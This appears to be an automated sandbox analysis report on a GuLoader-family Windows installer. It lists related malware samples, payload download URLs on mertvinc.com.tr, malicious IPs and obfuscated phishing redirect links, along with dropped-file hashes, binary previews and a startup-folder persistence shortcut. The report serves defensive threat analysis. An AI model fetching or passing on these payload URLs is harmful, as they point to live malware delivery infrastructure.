Sample name: yVVZdG2NJX.exe (renamed because the original name is a hash value)
Original Sample Name: 18ea5087eb82e075ca35d2b2dcff9450.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@12/21@1/2
EGA Information:
• Successful, ratio: 40%
HCA Information:
• Successful, ratio: 97%
• Number of executed functions: 311
• Number of non-executed functions: 76
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
• Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target powershell.exe, PID 1708 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 5900 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 656 because it is empty
• Not all processes were analysed; the report is missing behavior information
• Report size exceeded maximum capacity and may be missing behavior information
• Report size getting too big: too many NtCreateKey calls found
• Report size getting too big: too many NtOpenKeyEx calls found
• Report size getting too big: too many NtProtectVirtualMemory calls found
• Report size getting too big: too many NtQueryValueKey calls found
• Some HTTP raw data packets have been limited to 10 per session; see the PCAPs for the complete data
• VT rate limit hit for: yVVZdG2NJX.exe
Timeline (Time / Type / Description):
  10:37:46 / API Interceptor / 30x Sleep call for process: powershell.exe modified
  10:37:59 / API Interceptor / 440953x Sleep call for process: yVVZdG2NJX.exe modified
  16:38:02 / Autostart / Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\yVVZdG2NJX.lnk
IP context (Match / Associated sample / Detection / Threat name / Context):
  185.244.144.68:
    WC10SCPMaX.exe / malicious / Azorult, GuLoader / mertvinc.com.tr/fRzMqN204.bin
    MG-Docu6800001.exe / malicious / GuLoader / mertvinc.com.tr/LAbxmTzNBCWjnKNdG58.bin
    CL714440147.exe / malicious / GuLoader / mertvinc.com.tr/LAbxmTzNBCWjnKNdG58.bin
    TKnBbCiX07.exe / malicious / GuLoader / mertvinc.com.tr/LAbxmTzNBCWjnKNdG58.bin
    Snurrevoddenes.exe / malicious / GuLoader, Snake Keylogger, VIP Keylogger / mertvinc.com.tr/fYJJzdXnGgCBdwfMZh209.bin
    Eksistensberettigelsernes102.exe / malicious / GuLoader, Snake Keylogger, VIP Keylogger / mertvinc.com.tr/fYJJzdXnGgCBdwfMZh209.bin
    7000091945.xlsx.exe / malicious / Azorult, GuLoader / mertvinc.com.tr/OGDTCbBRybqnXF193.bin
  87.121.86.8:
    Payment Order #00004647.exe / malicious / XWorm
Match | Associated Sample Name / URL | Detection | Threat Name | Context
Match: mertvinc.com.tr
  WC10SCPMaX.exe | malicious | Azorult, GuLoader
    • 185.244.144.68
  Conchoids12.exe | malicious | GuLoader
    • 185.244.144.68
  Korrekturlsning.exe | malicious | GuLoader
    • 185.244.144.68
  Conchoids12.exe | malicious | GuLoader
    • 185.244.144.68
  Korrekturlsning.exe | malicious | GuLoader
    • 185.244.144.68
  MG-Docu6800001.exe | malicious | GuLoader
    • 185.244.144.68
  CL714440147.exe | malicious | GuLoader
    • 185.244.144.68
  TKnBbCiX07.exe | malicious | GuLoader
    • 185.244.144.68
  Snurrevoddenes.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger
    • 185.244.144.68
  Eksistensberettigelsernes102.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger
    • 185.244.144.68
Match: s-part-0035.t-0009.t-msedge.net
  Bestellung EB0072813.jar | malicious | Caesium Obfuscator, STRRAT
    • 13.107.246.63
  file.exe | malicious | LummaC Stealer
    • 13.107.246.63
  file.exe | malicious | Amadey, Clipboard Hijacker, Credential Flusher, Cryptbot, LummaC Stealer, Stealc
    • 13.107.246.63
  file.exe | malicious | LummaC Stealer
    • 13.107.246.63
  file.exe | malicious | Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc
    • 13.107.246.63
  file.exe | malicious | Credential Flusher
    • 13.107.246.63
  registration.msi | malicious | AteraAgent
    • 13.107.246.63
  Guidelines_for_Citizen_Safety.msi | malicious | AteraAgent
    • 13.107.246.63
  file.exe | malicious | LummaC Stealer
    • 13.107.246.63
  file.exe | malicious | Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar
    • 13.107.246.63
Match | Associated Sample Name / URL | Detection | Threat Name | Context
Match: BIRBIRTR
  WC10SCPMaX.exe | malicious | Azorult, GuLoader
    • 185.244.144.68
  Conchoids12.exe | malicious | GuLoader
    • 185.244.144.68
  Korrekturlsning.exe | malicious | GuLoader
    • 185.244.144.68
  Conchoids12.exe | malicious | GuLoader
    • 185.244.144.68
  Korrekturlsning.exe | malicious | GuLoader
    • 185.244.144.68
  MG-Docu6800001.exe | malicious | GuLoader
    • 185.244.144.68
  CL714440147.exe | malicious | GuLoader
    • 185.244.144.68
  TKnBbCiX07.exe | malicious | GuLoader
    • 185.244.144.68
  Snurrevoddenes.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger
    • 185.244.144.68
  Eksistensberettigelsernes102.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger
    • 185.244.144.68
Match: SKATTV-ASBG
  https://www.google.co.kr/url?url=https://hrtyuytitwagtxswxzqxpcm&jtdm=hjstxxb&qhwocq=elw&vrszx=mrursi&rtz=qksmlok&sdyxm=kxlpun&hnkj=iujyvng&vochgqf=ylsd&pkhfd=vyifcj&nymdhak=ffn&ylzv=xpddvxaj&zoadnebgoj=rccejsmuqd&q=amp/hmf1bnz.s%C2%ADlf%C2%ADpg%C2%ADq%C2%ADq%C2%ADwzu%C2%ADx%C2%ADppns%C2%ADc%C2%ADs%C2%AD.com%E2%80%8B/n7brnx1iy&lbgq=ihcrvpx&isffrcc=xjcvvbbd&hokv=buitobfj&nfzezydbgm=lhtjhglyxx&pjwu=tdsgcse&cesnzrb=ekoykarj&ifpv=yabmwecd&acyeqkflup=bacwibnnwl&dovx=vqvcdxk&rwbvdtj=khlezois&efgx=ktfpexjt&iqggbgjmwh=cvqmvfdelx&gqsh=ghsdgye&hipceti=hpqeesqk&hkvbucxuvo=drwoirzwsq&dril=qbpemxo&xziwtam=tdvywqlj&nndiwyldry=kjqbehmdbj&kqef=faiqetj&peigggc=vbyfdxky&fstmbbtmkx=rjxugltfmc&rpws=borxqez&rijvxqj=ntedqhtd&wohxxxgtmq=jpiozpkrbp&cxah=gcmtksp&tzidqah=syxnwioo&szzishkfke=xmnmodwwoc&xmif=xdxtrqz&ajzcojq=fmtqkshw&gkmh=vmwdknp&xvlhpuf=zkhqqziq&rvfh=igbqint&gdnzlky=hyzlhjke&dqkq=ophpttl&yoamsuz=cuykisoc&frzr=lajcnwi&chdmjpw=hymhkhbw&wnxy=zwkomqb&duxkrfq=asjrwcgu&fzya=hrpcnke&hxrusxm=foudbois&yqgm=uhfvxoo&uynyplq=iryzkatx&qfzs=stmleud&vkbxzkf=hxgbjzit&dnro=vjxntck&kfrldgj=vpyfihbn&nsko=sdzidzb&unudtuz=mnvrwokv&lisf=zxdfari&tdyzrah=otrtzuun&rfza=trokalr&vkfduyc=wpwvnxpe&jjsq=pgkbofh&uatnbjp=gtwiypfq&zilu=kagobvs&jqfufkw=bckrzetp&tjng=jgmmmod&fvdtpsk=vlyzfjep&mgoi=fklhysh&llyljdv=jxpogtdn&gcjv=vjlzkuf&erlhvti=peuprtov&kbxk=jviffkg&lklbxhl=uhzpnzfw&upaw=gfmiehp&ismxijp=hmwbsmgj&zdkc=kodikna&njllvzf=oodglyrw&urdk=cktezyn&vmqhwgh=kqcbhffu&riqy=tlnbqzr&nmlgrkn=inyeynzg&vebu=pwpghzr&ckpmyoc=tmeufjen&otic=svrqsdo&tbwzub | malicious | Unknown
    • 87.121.86.72
  http://cl4ycra.hgzcbqsqumhkfshql.com/kxosbfkve | malicious | Unknown
    • 87.121.86.72
  [EXTERNAL] Oakville shared ''o_akville_853473074_21.11.2024''.eml | malicious | Unknown
    • 87.121.86.72
  o4QEzeCniw.exe | malicious | Unknown
    • 87.120.237.130
  Payment Order #00004647.exe | malicious | XWorm
    • 87.121.86.8
  https://www.google.pl/url?url=http://msulrmrdjzsckgcdargfhi.com&nbq=tspwcyd&idbzok=wua&nbnak=ambmgo&lwf=vngmsem&q=amp/jdsra7r.ldn%C2%ADf%C2%ADpwlywydkjq%C2%ADuh%C2%ADf%C2%ADx%C2%AD.com/ufpd3kprb&xssr=zrcbvya&bhrswcv=abqvczic&clvu=wotwqzi&umasmoc=lhibfmio&tgek=sdcrupi&bpcjeel=qvmnlgnn&eign=czorcvw&txcfkja=lhtluzhk&zkmb=joyrkbk&mspp=frbfplx&ohrxtnn=emgsiphv&cbqf=eyyxrom&ngreupz=nzdjgaue&xtpz=fvqzpcq&spvwwuv=vijpphwi&wrjj=pklwpte&uuahvww=saaddjqz | malicious | Unknown
    • 87.121.86.72
  tfSYi9zABT.exe | malicious | Quasar
    • 87.121.86.32
  file.exe | malicious | Clipboard Hijacker, Cryptbot
    • 94.156.116.236
  https://www.google.com.bo/url?url=https://coqjcqixwpeuzndc&hpj=jguragr&fwbtzg=qoe&ffzzf=olnshn&aes=fvotjnl&garqe=txbrxc&emrj=ycbtmrgd&uwzlcgsurn=eygnbnharg&q=amp/jhjn24u.v%C2%ADvg%C2%ADzy%C2%ADnp%C2%ADe%C2%ADw%C2%ADl%C2%ADkkukl.com%E2%80%8B/4b3puorbt&vijx=zlglfoj&qcobrch=pupf&cjaim=omgedz&guneqiu=xqm&d=DwMFAg | malicious | Unknown
    • 87.121.86.72
  muAZlKU0hq.elf | malicious | Mirai
    • 87.120.53.129
                                                No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
Match: C:\Users\user\AppData\Local\Temp\nsg9061.tmp\System.dll
  ORDER 20240986 OA.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger
  PayeeAdvice_HK54912_R0038704_37504.exe | malicious | GuLoader, Snake Keylogger
  Conchoids12.exe | malicious | GuLoader
  Korrekturlsning.exe | malicious | GuLoader
  Conchoids12.exe | malicious | GuLoader
  Korrekturlsning.exe | malicious | GuLoader
  rTransferenciarealizada451236.exe | malicious | GuLoader
  rTransferenciarealizada451236.exe | malicious | GuLoader
  Purchase Order Purchase Order Purchase Order Purchase Order.exe | malicious | FormBook, GuLoader
  Purchase Order Purchase Order Purchase Order Purchase Order.exe | malicious | FormBook, GuLoader
                                                                    Process:C:\Users\user\Desktop\yVVZdG2NJX.exe
                                                                    File Type:DIY-Thermocam raw data (Lepton 2.x), scale 0-12, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset 0.000000, slope 649037107316853453566312041152512.000000
                                                                    Category:dropped
                                                                    Size (bytes):286686
                                                                    Entropy (8bit):1.2536158727628404
                                                                    Encrypted:false
                                                                    SSDEEP:768:3zbnVKpXfwz53wppkaub35azZSECekyln9KUXjJrv5YQ1ujVNDYb3ezsIhWCUiSL:KH4hI9iE3sLB9pXYzlkOYFWf9
                                                                    MD5:99A5E2E2953D0374F1E23FF8B0B6773F
                                                                    SHA1:5FC3F9C3638DD60012AB2F2ECDD016912BBDB9F3
                                                                    SHA-256:3D1233CB89AD10CCC6972697279A3741F6031E05D32738E9B34D37A230C0F84A
                                                                    SHA-512:1B002C12EAB187B0246483C5F3B0758DC84BCC884E1120A17B0412DFD349972DB5DA04E154AE21D405BA33BBD0C29AADFA7D1BF4D50347146D6DFCCBBD8DA94A
                                                                    Malicious:false
                                                                    Reputation:low
                                                                    Preview:.........................................|.........................F........................................................S..............................S.................................................................8....;........................^........................)......"..Y........B................d......................}.........i......................................9.....................................R...............]............................................................I.........u..................................j.....^.....................................................................W..................................................................................m......................................*.....................>..........O........[................................................B............................}..../...............................[.......?.............................Z..#.........................4...............................
                                                                    Process:C:\Users\user\Desktop\yVVZdG2NJX.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):472132
                                                                    Entropy (8bit):6.956351391553394
                                                                    Encrypted:false
                                                                    SSDEEP:6144:HVj1WHUoByvXRuu0P+kvEKo7LCM2yhNMu06zBeALFY9CIBtsAjA5LiXo:1jE0kyvXUu9JKeb2y7Q9CfAE5LT
                                                                    MD5:19EFFAFEA058EA49757155E12CFB70E0
                                                                    SHA1:8DFB7958DBCFC494B64DB93847D13FF442E0E124
                                                                    SHA-256:AF69D58C579FC312A5FF5C48567AD67F3E058DBDECE63D61F85712BEA671E0CE
                                                                    SHA-512:E2861474E49BAB0E4EEF83341973E35B2B8A6C03FADB6A9DE7A5798154783A5058EA6783BF1844B3599351DEDE6B0B17E3B27B17323119334C7369A33F72F8FD
                                                                    Malicious:false
                                                                    Reputation:low
                                                                    Preview:YYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY
                                                                    Process:C:\Users\user\Desktop\yVVZdG2NJX.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):73531
                                                                    Entropy (8bit):1.2569404898190384
                                                                    Encrypted:false
                                                                    SSDEEP:384:dVICOgr5CpPXeGASSCorJvHtPvpwqcQ+5pPZg71l4oLuZK52Oc410+RaL7VomsEa:dVcPX7U1R9mPZgx1hn32+emD40rd
                                                                    MD5:22148562A5A87FF1BECCAE5E77D87142
                                                                    SHA1:D1B04F09ACFC146855AA02A8C530AA8A45DF3F24
                                                                    SHA-256:B09EF713D0920E9671DA35332C6DAE7C1E12BE409A7077D6CA3E07938F9C08E9
                                                                    SHA-512:3F96B2ABED75C8EA941E45BB3835EF4D5FC92C5C5F829A738641FD398D88BB838E7C22A0F5F998BF387A5CE4ADC77EECAA049BCFB1A9ADD476871C871D58E811
                                                                    Malicious:false
                                                                    Preview:......................................................................................x..........................|........................................l...................a.........................................U.....................k..........................................G..................................................................|.....b....................O...R..........n...................&.....................l..................!.......6......... ......S.......................................}........................................7..................................................................................................................................................B......#......b....................60........?.....z.......>..........................:..............%..l...........g...........................=D.....{.....................................&........................{.......................i..........................................5.]............
                                                                    Process:C:\Users\user\Desktop\yVVZdG2NJX.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):220203
                                                                    Entropy (8bit):1.262001836842358
                                                                    Encrypted:false
                                                                    SSDEEP:768:EBCX3JLNVpAeI+EgywY0Szqqv3ib1RuU7thllrhAKF3+O1jaJgMH8JHuHR6qTSIT:EkLjwqF1z1MoqyH
                                                                    MD5:F8A828CA56113806A25802FF2AF74282
                                                                    SHA1:B016C4258BD1F9A19989E0C6B7AB993ED02DF96F
                                                                    SHA-256:95941451FFB946693877FBD721001ACC32FE70D75EA68CAB1756B3ADF77DCFF4
                                                                    SHA-512:6725AA09040FAC962CCFF2EF9897FB6F3F3706FE60D8C55A69CB9E0C21362B3C8C186C573D647C0A50438686D6035361A4A20138C451E641D507BD1218D1E079
                                                                    Malicious:false
                                                                    Preview:...................................................@......................................................................<....................................................O....../..........T.....................................i................................................................,.......................t.....................t.................................{!...................................................................................................X..........s.............@.............C....2................................-..............................w..............................................................H....................I........."..................C.................a................p...6.......................'......................................................................................%.............................x.................Q...................................z..........................i....hv...x.................`..........c.
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:data
                                                                    Category:modified
                                                                    Size (bytes):2232
                                                                    Entropy (8bit):5.379540626579189
                                                                    Encrypted:false
                                                                    SSDEEP:48:NlWSU4y4RFymFoUeW+gZ9tK8NPZHUxL7u1iMuge//MPUyus:NlLHyIFvKLgZ2KRHWLOugss
                                                                    MD5:11EABB3351BC466B48B7FF5E30F74994
                                                                    SHA1:AEEC7B7A907A23382CD1E5632F17B9E65B34F4A5
                                                                    SHA-256:9B6048D28C896229FC7B915763BBB51F03F05914B2A02D9B792305E2F8A714A9
                                                                    SHA-512:658F56F52525478CC627956DEDB5A669E581BFB62B94B7EDBB508565F1D3B12744EC942CBE6B4B4CD42D70275DD801566957DFE94210CFF5BA1CB1C9FEF089FE
                                                                    Malicious:false
                                                                    Preview:@...e.................................[..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                                    Process:C:\Users\user\Desktop\yVVZdG2NJX.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):29
                                                                    Entropy (8bit):3.598349098128234
                                                                    Encrypted:false
                                                                    SSDEEP:3:rRSFYJKXzovNsra:EFYJKDoWra
                                                                    MD5:2C11513C4FAB02AEDEE23EC05A2EB3CC
                                                                    SHA1:59177C177B2546FBD8EC7688BAD19D08D32640DE
                                                                    SHA-256:BCF3676333E528171EEE1055302F3863A0C89D9FFE7017EA31CF264E13C8A699
                                                                    SHA-512:08196AFA62650F1808704DCAD9918DA11175CD8792878F63E35F517B4D6CF407AC9E281D9B71A76E4CC1486CAD7079C56B74ECBEDB0A0F0DD4170FB0D30D2BAD
                                                                    Malicious:false
                                                                    Preview:....### explorer ###..[WIN]r
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Users\user\Desktop\yVVZdG2NJX.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):11776
Entropy (8bit):5.890541747176257
Encrypted:false
SSDEEP:192:X24sihno0bW+l97H4GB7QDs91kMtwtobTr4u+QHbazMNHT7dmNIEr:m8vJl97JeoxtN/r3z7YV
MD5:75ED96254FBF894E42058062B4B4F0D1
SHA1:996503F1383B49021EB3427BC28D13B5BBD11977
SHA-256:A632D74332B3F08F834C732A103DAFEB09A540823A2217CA7F49159755E8F1D7
SHA-512:58174896DB81D481947B8745DAFE3A02C150F3938BB4543256E8CCE1145154E016D481DF9FE68DAC6D48407C62CBE20753320EBD5FE5E84806D07CE78E0EB0C4
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 3%
Joe Sandbox View:
• Filename: ORDER 20240986 OA.exe, Detection: malicious
• Filename: PayeeAdvice_HK54912_R0038704_37504.exe, Detection: malicious
• Filename: Conchoids12.exe, Detection: malicious
• Filename: Korrekturlsning.exe, Detection: malicious
• Filename: Conchoids12.exe, Detection: malicious
• Filename: Korrekturlsning.exe, Detection: malicious
• Filename: rTransferenciarealizada451236.exe, Detection: malicious
• Filename: rTransferenciarealizada451236.exe, Detection: malicious
• Filename: Purchase Order Purchase Order Purchase Order Purchase Order.exe, Detection: malicious
• Filename: Purchase Order Purchase Order Purchase Order Purchase Order.exe, Detection: malicious
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L.....oZ...........!..... ...........).......0...............................`............@..........................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..c....0.......$..............@..@.data...x....@.......(..............@....reloc..~....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
Process:C:\Users\user\Desktop\yVVZdG2NJX.exe
File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sun Nov 24 14:37:58 2024, mtime=Sun Nov 24 14:37:58 2024, atime=Sun Nov 24 14:37:58 2024, length=568338, window=hide
Category:dropped
Size (bytes):780
Entropy (8bit):5.184083524925253
Encrypted:false
SSDEEP:12:8XyByXK+4mggSYChylZY//6sGcrjL5vwoOjAGNHqK09p7x7PmV:8XyByXkXe3SCsd50APzp9m
MD5:E9C48A93ECF30E0FC7ADC942EF700F99
SHA1:DF646A5228760C031240F2ED3E5DB6DB0DFCF89C
SHA-256:5D9EF200BE2A0250F774FC64B32E7CA3791CF984505FE66DDC3CB34D36591E0B
SHA-512:B7701AB47D4DFA99B53A5BE5100E2CAFD0D84084E7F8E1E15E64E14B8D5F200CE53F281415201CF25FB8ED9503E2F32EEAF5939CBE37F1CE768C23FB8AF35338
Malicious:false
Preview:L..................F.... ....O..>...O..>...O..>..........................~.:..DG..Yr?.D..U..k0.&...&.........5q........>......>......t...CFSF..1.....EW)N..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW)NxY.|...........................c..A.p.p.D.a.t.a...B.V.1.....xY.|..Roaming.@......EW)NxY.|...........................v..R.o.a.m.i.n.g.....j.2.....xY.| .YVVZDG~1.EXE..N......xY.|xY.|..........................E..y.V.V.Z.d.G.2.N.J.X...e.x.e.......[...............-.......Z...........F6.......C:\Users\user\AppData\Roaming\yVVZdG2NJX.exe........\.....\.....\.....\.....\.y.V.V.Z.d.G.2.N.J.X...e.x.e.`.......X.......585948...........hT..CrF.f4... ./.f.z....+...E...hT..CrF.f4... ./.f.z....+...E..E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................
Process:C:\Users\user\Desktop\yVVZdG2NJX.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:dropped
Size (bytes):568338
Entropy (8bit):7.747481849809548
Encrypted:false
SSDEEP:12288:32EIiN/Z1++w1p+wJuQbIgJwCQBk5wBcamd3ZhZs:3wiN/K+wHBfhQBk5s3mdPZs
MD5:18EA5087EB82E075CA35D2B2DCFF9450
SHA1:DC436FBAA777672D44A8B90B98C4A1C266885845
SHA-256:A7247C64CC0168290CA3B210E59EF629B46F513205BC6562EC79CDD2CDA71725
SHA-512:8FBEB3CAF13A3FE1359002C2848FF5767E6B2F226049546C683F2B6144756196CFE39F66E4959C8426CDFAEFF6A169A4CF5939DE241E4A898887D8810EC620C6
Malicious:true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 42%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!`G.@...@...@../OQ..@...@..I@../OS..@...c>..@..+F...@..Rich.@..........................PE..L.....oZ.................d....:.....l3............@...........................=...........@..........................................p<..p...........................................................................................................text....d.......d.................. ..`.rdata...............h..............@..@.data...8.9..........|..............@....ndata........:..........................rsrc....p...p<..p..................@..@................................................................................................................................................................................................................................................................................................................................................
File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):7.747481849809548
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
